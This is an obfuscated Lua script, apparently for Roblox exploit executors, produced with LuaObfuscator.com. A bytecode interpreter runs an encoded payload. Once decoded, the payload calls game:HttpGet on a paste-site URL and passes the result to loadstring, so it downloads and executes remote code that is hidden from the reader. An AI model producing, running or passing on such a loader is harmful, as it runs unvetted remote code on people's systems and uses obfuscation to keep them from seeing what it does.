--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v83=v2(v0(v30,16));if v19 then local v91=v5(v83,v19);v19=nil;return v91;else return v83;end end end);local function v20(v31,v32,v33)if v33 then local v84=0 -0 ;local v85;while true do if (v84==(0 -0)) then v85=(v31/((3 -1)^(v32-(2 -1))))%(((885 -264) -(555 + 64))^(((v33-((1997 -(68 + 997)) -(857 + 74))) -(v32-(569 -(367 + 201)))) + 1)) ;return v85-(v85%(928 -(214 + 713))) ;end end else local v86=0;local v87;while true do if (v86==(0 + (1270 -(226 + 1044)))) then v87=(1 + 1)^(v32-(878 -(282 + 595))) ;return (((v31%(v87 + v87))>=v87) and (1638 -(1523 + 114))) or (0 + 0) ;end end end end local function v21()local v34=117 -(32 + 85) ;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==((0 -0) + 0)) then v35=v1(v16,v18,v18);v18=v18 + (4 -3) ;v34=(3 -1) -(351 -(87 + 263)) ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (182 -(67 + 113)) );v18=v18 + 2 + 0 ;return (v37 * (628 -372)) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 + 0 );v18=v18 + (15 -11) ;return (v41 * (16778168 -((1799 -(915 + 82)) + 150))) + (v40 * (176444 -110908)) + (v39 * (464 -208)) + v38 ;end local function v24()local v42=0 -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(0 + 0)) then v43=v23();v44=v23();v42=1 -(0 -0) ;end if (v42==(2 + 1)) then if (v47==(1187 -(1069 + 118))) then if (v46==(0 -0)) then return v48 * ((0 + 0) -0) ;else v47=1 + 0 ;v45=0 -0 ;end elseif (v47==(2031 + 16)) then return ((v46==(791 -((1069 -(376 + 325)) + 423))) and (v48 * ((3 -2)/0))) or (v48 * NaN) ;end return v8(v48,v47-(1041 -(10 + 8)) ) * (v45 + (v46/(2^(199 -147)))) ;end if (v42==(1082 -(1020 + 60))) then v47=v20(v44,463 -((1471 -(87 + 968)) + 26) ,98 -67 );v48=((v20(v44,14 + 18 )==((4 -3) -0)) and  -(3 -2)) or ((399 + 40) -(145 + (479 -186))) ;v42=(978 -545) -(44 + 386) ;end if (v42==(1487 -(998 + 488))) then v45=1914 -(1789 + 124) ;v46=(v20(v44,1 + 0 + 0 ,(1430 -(447 + 966)) + 3 ) * (((10 -5) -3)^(804 -(201 + 571)))) + v43 ;v42=1 + (15 -(9 + 5)) ;end end end local function v25(v49)local v50;if  not v49 then local v88=376 -(85 + 291) ;while true do if (v88==((2445 -(1123 + 57)) -(243 + 832 + 190))) then v49=v23();if (v49==0) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(3 -2) );v18=v18 + v49 ;local v51={};for v65=1 + 0 , #v50 do v51[v65]=v2(v1(v3(v50,v65,v65)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;while true do local v67=1551 -(226 + 1325) ;local v68;while true do if (v67~=0) then else v68=0;while true do if (v68==(0 + 0)) then if (0==v52) then v53={};v54={};v55={};v52=1;end if (v52==(2 + 0)) then local v98=0;while true do if (v98==(0 + 0)) then for v130=1 -0 ,v57 do local v131=0 -0 ;local v132;local v133;while true do if (v131==1) then if (v132==1) then v133=v21()~=(0 + 0) ;elseif (v132==2) then v133=v24();elseif (v132==(1639 -(1373 + 263))) then v133=v25();end v58[v130]=v133;break;end if (v131==(1000 -(451 + 549))) then local v154=0 + 0 ;while true do if (v154~=0) then else v132=v21();v133=nil;v154=1 -0 ;end if (v154==(1 -0)) then v131=1385 -(746 + 638) ;break;end end end end end v56[3]=v21();v98=1;end if (v98~=1) then else for v134=1 + 0 ,v23() do local v135=0 -0 ;local v136;local v137;while true do if ((341 -(218 + 123))==v135) then local v155=1581 -(1535 + 46) ;local v156;while true do if (v155==0) then v156=0;while true do if (v156==0) then v136=0 + 0 ;v137=nil;v156=1;end if (v156~=(1 + 0)) then else v135=561 -(306 + 254) ;break;end end break;end end end if (v135==(1 + 0)) then while true do if (v136~=(0 -0)) then else v137=v21();if (v20(v137,1468 -(899 + 568) ,1 + 0 )==(0 -0)) then local v161=0;local v162;local v163;local v164;local v165;while true do if (v161==(603 -(268 + 335))) then v162=290 -(60 + 230) ;v163=nil;v161=573 -(426 + 146) ;end if (1~=v161) then else local v166=0 + 0 ;while true do if (v166~=1) then else v161=2;break;end if (v166==0) then v164=nil;v165=nil;v166=1457 -(282 + 1174) ;end end end if (v161~=2) then else while true do if ((813 -(569 + 242))~=v162) then else local v167=0 -0 ;while true do if (v167==1) then v162=1 + 2 ;break;end if (v167==0) then if (v20(v164,1025 -(706 + 318) ,1)==(1252 -(721 + 530))) then v165[2]=v58[v165[2]];end if (v20(v164,1273 -(945 + 326) ,4 -2 )==(1 + 0)) then v165[3]=v58[v165[3]];end v167=1;end end end if (v162==(701 -(271 + 429))) then v165={v22(),v22(),nil,nil};if (v163==(1500 -(1408 + 92))) then local v171=0;local v172;local v173;local v174;while true do if (v171==1) then v174=nil;while true do if (v172~=0) then else v173=1086 -(461 + 625) ;v174=nil;v172=1;end if (v172~=1) then else while true do if (v173==(1288 -(993 + 295))) then v174=0 + 0 ;while true do if (v174~=(1171 -(418 + 753))) then else v165[2 + 1 ]=v22();v165[1 + 3 ]=v22();break;end end break;end end break;end end break;end if (v171~=(0 + 0)) then else v172=0;v173=nil;v171=1 + 0 ;end end elseif (v163==(530 -(406 + 123))) then v165[3]=v23();elseif (v163==2) then v165[1772 -(1749 + 20) ]=v23() -(2^(4 + 12)) ;elseif (v163==(1325 -(1249 + 73))) then local v183=0;local v184;while true do if (v183==(0 + 0)) then v184=1145 -(466 + 679) ;while true do if ((0 -0)~=v184) then else v165[8 -5 ]=v23() -(2^(1916 -(106 + 1794))) ;v165[4]=v22();break;end end break;end end end v162=1 + 1 ;end if (v162==3) then if (v20(v164,3,3)~=(1 + 0)) then else v165[4]=v58[v165[11 -7 ]];end v53[v134]=v165;break;end if (v162==0) then local v169=0 -0 ;local v170;while true do if (v169==0) then v170=0;while true do if (v170==(115 -(4 + 110))) then v162=1;break;end if (v170==0) then v163=v20(v137,586 -(57 + 527) ,3);v164=v20(v137,1431 -(41 + 1386) ,6);v170=1;end end break;end end end end break;end end end break;end end break;end end end v52=106 -(17 + 86) ;break;end end end v68=1 + 0 ;end if (v68==(1 -0)) then if (v52~=3) then else for v101=2 -1 ,v23() do v54[v101-(167 -(122 + 44)) ]=v28();end return v56;end if (v52==1) then local v99=0 -0 ;local v100;while true do if (0~=v99) then else v100=0 -0 ;while true do if (v100==(1 + 0)) then v58={};v52=1 + 1 ;break;end if (v100==0) then local v152=0 -0 ;while true do if (v152==1) then v100=66 -(30 + 35) ;break;end if (v152~=(0 + 0)) then else v56={v53,v54,nil,v55};v57=v23();v152=3 -2 ;end end end end break;end end end break;end end break;end end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v69=v62;local v70=v63;local v71=v64;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v89=0,v77 do if (v89>=v71) then v75[v89-v71 ]=v76[v89 + 1 ];else v79[v89]=v76[v89 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v90=0;while true do if (v90==1) then if (v82<=3) then if (v82<=1) then if (v82>0) then v79[v81[2]]=v81[3]~=0 ;elseif ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v61;else v79[v81[2]]=v61[v81[3]];end elseif (v82==2) then v79[v81[2]]=v81[3];else local v106=v81[2];local v107=v79[v81[3]];v79[v106 + 1 ]=v107;v79[v106]=v107[v81[4]];end elseif (v82<=5) then if (v82>4) then local v111;local v112,v113;local v114;local v115;if ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v61;else v79[v81[2]]=v61[v81[3]];end v73=v73 + 1 ;v81=v69[v73];if ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v61;else v79[v81[2]]=v61[v81[3]];end v73=v73 + 1 ;v81=v69[v73];v115=v81[2];v114=v79[v81[3]];v79[v115 + 1 ]=v114;v79[v115]=v114[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3]~=0 ;v73=v73 + 1 ;v81=v69[v73];v115=v81[2];v112,v113=v72(v79[v115](v13(v79,v115 + 1 ,v81[3])));v74=(v113 + v115) -1 ;v111=0;for v127=v115,v74 do v111=v111 + 1 ;v79[v127]=v112[v111];end v73=v73 + 1 ;v81=v69[v73];v115=v81[2];v79[v115]=v79[v115](v13(v79,v115 + 1 ,v74));v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]();v73=v73 + 1 ;v81=v69[v73];do return;end else local v124=v81[2];v79[v124]=v79[v124](v13(v79,v124 + 1 ,v74));end elseif (v82<=6) then do return;end elseif (v82==7) then v79[v81[2]]();else local v147=0;local v148;local v149;local v150;local v151;while true do if (v147==1) then v74=(v150 + v148) -1 ;v151=0;v147=2;end if (v147==0) then v148=v81[2];v149,v150=v72(v79[v148](v13(v79,v148 + 1 ,v81[3])));v147=1;end if (v147==2) then for v158=v148,v74 do v151=v151 + 1 ;v79[v158]=v149[v151];end break;end end end v73=v73 + 1 ;break;end if (0==v90) then v81=v69[v73];v82=v81[1];v90=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403133O00682O7470733A2O2F73687A2E616C2F6B78586D00093O0012053O00013O00122O000100023O00202O00010001000300122O000300046O000400016O000100049O0000026O000100016O00017O00",v9(),...);
